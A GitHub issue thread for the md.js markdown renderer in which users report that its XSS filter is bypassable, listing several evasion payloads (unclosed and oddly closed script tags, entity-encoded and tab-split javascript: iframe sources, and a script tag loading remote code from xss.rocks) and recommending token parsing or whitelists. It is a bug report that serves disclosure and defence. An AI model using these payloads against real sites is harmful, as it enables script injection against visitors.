md.js icon indicating copy to clipboard operation
md.js copied to clipboard
verified publisher icon thysultan

More XSS

Open Zolmeister opened this issue 8 years ago • 1 comments

https://github.com/thysultan/md.js/issues/1

script tag without closing tag

<script src="data:,alert(1)">

script tag with non-plain closing tag

<script>alert(1)</script >

hex html encoded (with and without semicolons) javascript:

<iframe src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>

embedded tab to break up javascript:

<iframe src="java	script:alert(1)">

there may be more, check out https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

my recommendation would be to avoid using regex and instead opt for manual token parsing (or just remove all HTML support...). white lists are great too

Zolmeister avatar Aug 14 '17 04:08 Zolmeister

It also fails:

<script src=http://xss.rocks/xss.js></script>

IMHO the best option is following the "do one thing and do it well" philosophy: make it work only as a markdown renderer and remove the XSS filter.

qgustavor avatar May 10 '18 21:05 qgustavor